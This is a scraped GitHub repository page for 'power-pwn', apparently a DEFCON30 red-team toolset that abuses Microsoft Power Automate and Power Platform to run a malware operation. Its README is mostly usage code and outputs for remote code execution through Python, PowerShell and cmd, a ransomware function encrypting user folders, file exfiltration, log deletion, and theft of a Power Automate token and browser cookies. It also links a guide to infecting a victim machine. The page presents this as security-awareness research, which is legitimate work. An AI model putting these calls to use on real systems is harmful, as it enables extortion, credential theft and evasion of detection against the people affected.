8000 GitHub - mbrg/power-pwn at v1
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ power-pwn Public

An offensive security toolset for Microsoft 365 focused on Microsoft Copilot, Copilot Studio and Power Platform

License

MIT license
946 stars 99 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

mbrg/power-pwn

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
assets
assets
 
 
docs
docs
 
 
schema
schema
 
 
solution/pwntoso_1_0_0_1
solution/pwntoso_1_0_0_1
 
 
src/powerpwn
src/powerpwn
 
 
.gitignore
.gitignore
 
 
license
license
 
 
readme.md
readme.md
 
 
setup.txt
setup.txt
 
 

Repository files navigation

Power Pwn

Power Pwn is a demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

Power Pwn

This tool was released as part of DEFCON30. For more details, see No-Code Malware: Windows 11 At Your Service.

Disclaimer: these materials are presented from an attacker’s perspective with the goal of raising awareness to the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome.

Usage

from powerpwn.cli import PowerPwn
POST_URL = ""
pp=PowerPwn(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").CodeExec
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").CodeExec
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").CodeExec

# commandline
pp.exec_cmd("echo \"hello word\"").CodeExec
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").Ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").Exfil
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").Exfil
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().Cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().StealPowerAutomateToken
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie
pp.steal_cookie("https://www.google.com").StealCookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your Power Pwn cloud environment

How to infect a victim machine

How to troubleshoot execution errors

About

An offensive security toolset for Microsoft 365 focused on Microsoft Copilot, Copilot Studio and Power Platform

Topics

hacking pentesting hacking-tool powerapps redteaming redteam rpa nocode m365 microsoft365 lowcode powerautomate redteamer roboticprocessautomation defcon30 ai-red-team blackhat2023 copilotstudio copilot-for-microsoft-365 blackhat2024

Resources

Readme

License

MIT license
Activity

Stars

946 stars

Watchers

20 watching

Forks

99 forks
Report repository

Releases 9

v3.0.1 Latest
Aug 9, 2024
+ 8 releases

Contributors 7

Languages
0